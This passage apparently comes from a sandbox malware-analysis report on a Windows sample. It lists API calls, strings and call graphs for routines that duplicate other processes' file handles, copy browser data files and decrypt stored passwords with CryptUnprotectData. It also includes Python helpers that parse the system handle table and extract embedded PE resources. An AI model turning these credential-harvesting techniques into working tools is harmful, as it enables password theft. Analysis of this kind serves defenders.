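        if status != STATUS_INFO_LENGTH_MISMATCH:
            raise OSError("NtQuerySystemInformation failed: 0x%08X" % status)
        buf_len *= 2
    raise MemoryError("handle table larger than max_len")


def parse_handle_table(data):
    """Decode the ULONG count and the packed entry array into dicts."""
    count, = struct.unpack_from("<I", data, 0)
    if len(data) < 4 + count * ENTRY_SIZE:
        raise ValueError("truncated SYSTEM_HANDLE_INFORMATION buffer")
    entries = []
    for i in range(count):
        pid, _bt, type_idx, attrs, handle, obj, access = struct.unpack_from(
            ENTRY_FMT, data, 4 + i * ENTRY_SIZE)
        entries.append({"pid": pid, "type": type_idx, "attrs": attrs,
                        "handle": handle, "object": obj, "access": access})
    return entries


def pids_for_names(process_list, names):
    """Case-insensitive image-name match, as _wcsicmp does, over (pid, name) pairs."""
    wanted = {n.lower() for n in names}
    return {pid for pid, name in process_list if name.lower() in wanted}


def handles_owned_by(entries, pids):
    """Entries whose UniqueProcessId is one of the selected processes: the handles
    the routine can reach with OpenProcess(PROCESS_DUP_HANDLE) + DuplicateHandle."""
    return [e for e in entries if e["pid"] in pids]
```

On a live system the Object field is a kernel pointer and HandleValue is only meaningful inside the owning process, which is why the routine needs PROCESS_DUP_HANDLE and DuplicateHandle (0040DF23) before it can inspect a handle it found this way.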

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                              • memset.MSVCRT ref: 00413D7F
                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                              • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                              • memset.MSVCRT ref: 00413E07
                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                              • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                              • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                              • CloseHandle.KERNELBASE(?), ref: 00413EA8
                                                                              • free.MSVCRT ref: 00413EC1
                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Handle$CloseProcessProcess32freememset$AddressCreateFirstFullImageModuleNameNextOpenProcQuerySnapshotToolhelp32
                                                                              • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                              • API String ID: 3536422406-1740548384
                                                                              • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                              • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                              • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                              • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                              Control-flow Graph

                                                                              [Basic-block graph for function 0040B58D (interactive viewer residue; the executed/not-executed colouring is not recoverable). Blocks in order: 0040B58D entry; 0040B5A4 GetModuleHandleW, FindResourceW; 0040B5C2 LoadResource; 0040B5D0 SizeofResource, LockResource; three short blocks at 0040B5E7, 0040B5E9 and 0040B5ED that either branch to the return at 0040B62E or fall through to 0040B5F1; 0040B5F1 call 0040AFCF (allocate), memcpy, call 0040B4D3, call 0040B3C1, call 0040B04B (free), then the return at 0040B62E.]
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                              • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                              • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                              • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                              • String ID: AE$BIN
                                                                              • API String ID: 1668488027-3931574542
                                                                              • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                              • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                              • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                              • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
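The function above resolves an embedded resource with FindResourceW(NULL, MAKEINTRESOURCE(0x32), L"BIN"), sizes and locks it, and copies it out with memcpy at 0040B60D. The following is an added example, not code from the report or from the sample, showing how that lookup resolves against the three-level PE resource tree (type, name, language) so the same resource can be pulled from the dumped image statically. It assumes the argument order shown in the API list (name ID 50, type string "BIN"); the function names find_resource and build_sample_rsrc, the section RVA 0x59000, the language ID 0x409 and the payload bytes are all constructed for the example.

```python
import struct

# On-disk structures of the PE resource tree (all little-endian):
# IMAGE_RESOURCE_DIRECTORY: Characteristics, TimeDateStamp, MajorVersion,
#   MinorVersion, NumberOfNamedEntries, NumberOfIdEntries
DIR_FMT = "<IIHHHH"
# IMAGE_RESOURCE_DIRECTORY_ENTRY: Name (ID, or high bit | string offset),
#   OffsetToData (high bit | subdirectory offset, or data-entry offset)
ENTRY_FMT = "<II"
# IMAGE_RESOURCE_DATA_ENTRY: OffsetToData (an RVA), Size, CodePage, Reserved
DATA_FMT = "<IIII"
HIGH_BIT = 0x80000000

# Constructed placeholder body; the report does not say what resource BIN/50 holds.
SAMPLE_PAYLOAD = b"\x00\x11\x22\x33" + b"constructed resource body"


def _read_name(rsrc, off):
    """IMAGE_RESOURCE_DIR_STRING_U: WORD Length followed by Length UTF-16LE chars."""
    (length,) = struct.unpack_from("<H", rsrc, off)
    return rsrc[off + 2:off + 2 + 2 * length].decode("utf-16-le")


def _entries(rsrc, dir_off):
    """Yield (key, OffsetToData) for each entry of the directory at dir_off;
    key is a str for named entries and an int for ID entries."""
    *_, n_named, n_id = struct.unpack_from(DIR_FMT, rsrc, dir_off)
    pos = dir_off + struct.calcsize(DIR_FMT)
    for _ in range(n_named + n_id):
        name, data = struct.unpack_from(ENTRY_FMT, rsrc, pos)
        yield (_read_name(rsrc, name & ~HIGH_BIT) if name & HIGH_BIT else name), data
        pos += struct.calcsize(ENTRY_FMT)


def _child(rsrc, dir_off, wanted):
    """OffsetToData of the entry keyed `wanted` in the directory at dir_off, or None."""
    return next((data for key, data in _entries(rsrc, dir_off) if key == wanted), None)


def find_resource(rsrc, rsrc_rva, type_key, name_key, lang_key=None):
    """Static equivalent of FindResourceW(NULL, name, type) followed by
    LoadResource/SizeofResource/LockResource: walk type -> name -> language and
    return the resource bytes, or None if any level is missing.
    lang_key=None takes the first language entry."""
    type_dir = _child(rsrc, 0, type_key)
    if type_dir is None or not type_dir & HIGH_BIT:
        return None
    name_dir = _child(rsrc, type_dir & ~HIGH_BIT, name_key)
    if name_dir is None or not name_dir & HIGH_BIT:
        return None
    langs = list(_entries(rsrc, name_dir & ~HIGH_BIT))
    leaf = langs[0][1] if (lang_key is None and langs) else dict(langs).get(lang_key)
    if leaf is None or leaf & HIGH_BIT:      # missing, or a malformed fourth level
        return None
    data_rva, size, _, _ = struct.unpack_from(DATA_FMT, rsrc, leaf)
    off = data_rva - rsrc_rva                # OffsetToData is an RVA, not a section offset
    if off < 0 or off + size > len(rsrc):
        return None
    return rsrc[off:off + size]


def build_sample_rsrc(rsrc_rva=0x59000):
    """Construct a minimal .rsrc section holding one resource: type "BIN",
    name ID 50, language 0x409 (constructed test data)."""
    def directory(named, ids):
        return struct.pack(DIR_FMT, 0, 0, 0, 0, named, ids)
    # Layout (offsets from the start of the section):
    #   0  root dir + 1 named entry "BIN"  -> subdirectory at 24
    #  24  type dir + 1 ID entry 50        -> subdirectory at 48
    #  48  name dir + 1 ID entry 0x409     -> data entry at 72
    #  72  IMAGE_RESOURCE_DATA_ENTRY
    #  88  DIR_STRING_U "BIN"
    #  96  resource body
    body = b"".join([
        directory(1, 0), struct.pack(ENTRY_FMT, HIGH_BIT | 88, HIGH_BIT | 24),
        directory(0, 1), struct.pack(ENTRY_FMT, 50, HIGH_BIT | 48),
        directory(0, 1), struct.pack(ENTRY_FMT, 0x409, 72),
        struct.pack(DATA_FMT, rsrc_rva + 96, len(SAMPLE_PAYLOAD), 0, 0),
        struct.pack("<H", 3) + "BIN".encode("utf-16-le"),
    ])
    assert len(body) == 96
    return body + SAMPLE_PAYLOAD, rsrc_rva


if __name__ == "__main__":
    rsrc, rva = build_sample_rsrc()
    data = find_resource(rsrc, rva, "BIN", 50)
    print(f"BIN/50: {len(data)} bytes, starts {data[:4].hex()}")
```

To run this against the dumped module, replace build_sample_rsrc() with the raw .rsrc section bytes and that section's VirtualAddress from the section table; the bytes returned are what the sample copies with memcpy at 0040B60D.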
                                                                              APIs
                                                                              • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                              • GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
                                                                              • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                              • String ID:
                                                                              • API String ID: 767404330-0
                                                                              • Opcode ID: c4d4f020b90e859bc6bc15c56e0cdb0905d1a3ad4ff77b848f90db8d1e9fca36
                                                                              • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                              • Opcode Fuzzy Hash: c4d4f020b90e859bc6bc15c56e0cdb0905d1a3ad4ff77b848f90db8d1e9fca36
                                                                              • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                              APIs
                                                                              • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                              • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$FirstNext
                                                                              • String ID:
                                                                              • API String ID: 1690352074-0
                                                                              • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                              • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                              • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                              • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                              APIs
                                                                              • memset.MSVCRT ref: 0041898C
                                                                              • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: InfoSystemmemset
                                                                              • String ID:
                                                                              • API String ID: 3558857096-0
                                                                              • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                              • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                              • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                              • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                              Control-flow Graph (summary; the graph has roughly 280 basic blocks and its full edge list is not reproduced here)

                                                                              • 0044553B-00445558: entry, call 0044DB70; then 0044555A-0044557C calls 0040C768, 0040BDB0 and 004135F7 (the GetProcAddress resolver listed below)
                                                                              • 004455A8-004455E3: memset, call 00403988, wcsrchr; the function then branches into a long chain of similar blocks
                                                                              • Repeated pattern (e.g. 004458BB-0044592B, 0044595E-004459CE, 00445C8B-00445CF3, 00445D88-00445E15): memset ×2 or ×3, call 00414C2E (SHGetSpecialFolderPathW), call 0040B2CC, call 00409D1F (path concatenation), call 00409B98 (GetFileAttributesW), i.e. build a candidate path and test whether it exists
                                                                              • Hits lead to call 0040B6EF (the CopyFileW/CryptUnprotectData routine listed further below) or call 00445093 (file read), and to the directory walk via calls 0040AE18, 0040ADD4, 0040AE51 and 0040AEBE
                                                                              • 00445D3D-00445D65: call 00409C52, call 0040B2CC, _wcsicmp
                                                                              • 00445FAE-00445FB2: common exit block
                                                                              APIs
                                                                              • memset.MSVCRT ref: 004455C2
                                                                              • wcsrchr.MSVCRT ref: 004455DA
                                                                              • memset.MSVCRT ref: 0044570D
                                                                              • memset.MSVCRT ref: 00445725
                                                                                • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000,000000F1,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 0041362A
                                                                              • memset.MSVCRT ref: 0044573D
                                                                              • memset.MSVCRT ref: 00445755
                                                                              • memset.MSVCRT ref: 004458CB
                                                                              • memset.MSVCRT ref: 004458E3
                                                                              • memset.MSVCRT ref: 0044596E
                                                                              • memset.MSVCRT ref: 00445A10
                                                                              • memset.MSVCRT ref: 00445A28
                                                                              • memset.MSVCRT ref: 00445AC6
                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 00414C68
                                                                                • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                              • memset.MSVCRT ref: 00445B52
                                                                              • memset.MSVCRT ref: 00445B6A
                                                                              • memset.MSVCRT ref: 00445C9B
                                                                              • memset.MSVCRT ref: 00445CB3
                                                                              • _wcsicmp.MSVCRT ref: 00445D56
                                                                              • memset.MSVCRT ref: 00445B82
                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
                                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                              • memset.MSVCRT ref: 00445986
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                              • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                              • API String ID: 4101496090-3798722523
                                                                              • Opcode ID: 996140e6ccd422487fd81670db3a520017ce6680b76ca4f8d5fcb996192b84c6
                                                                              • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                              • Opcode Fuzzy Hash: 996140e6ccd422487fd81670db3a520017ce6680b76ca4f8d5fcb996192b84c6
                                                                              • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044D5
                                                                                • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                              • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                              • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                              • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                              • String ID: $/deleteregkey$/savelangfile
                                                                              • API String ID: 2744995895-28296030
                                                                              • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                              • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                              • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                              • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • memset.MSVCRT ref: 0040B71C
                                                                                • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                              • wcsrchr.MSVCRT ref: 0040B738
                                                                              • memset.MSVCRT ref: 0040B756
                                                                              • memset.MSVCRT ref: 0040B7F5
                                                                              • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
                                                                              • CopyFileW.KERNEL32(00445FAE,?,00000000), ref: 0040B82D
                                                                              • CloseHandle.KERNELBASE(00000000), ref: 0040B838
                                                                              • memset.MSVCRT ref: 0040B851
                                                                              • memset.MSVCRT ref: 0040B8CA
                                                                              • memcmp.MSVCRT ref: 0040B9BF
                                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
                                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                              • memset.MSVCRT ref: 0040BB53
                                                                              • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                              • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                              • String ID: chp$v10
                                                                              • API String ID: 1297422669-2783969131
                                                                              • Opcode ID: 6440b8aaedc793584c46e1f7082173f882f72b17e7fe89946ab94d20f5a55b5d
                                                                              • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                              • Opcode Fuzzy Hash: 6440b8aaedc793584c46e1f7082173f882f72b17e7fe89946ab94d20f5a55b5d
                                                                              • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040DDD4
                                                                                • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004), ref: 0040DE3E
                                                                                • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                              • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                              • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                              • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                                                                              • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                              • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                              • UnmapViewOfFile.KERNELBASE(00000000), ref: 0040E135
                                                                              • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                              • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                              • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
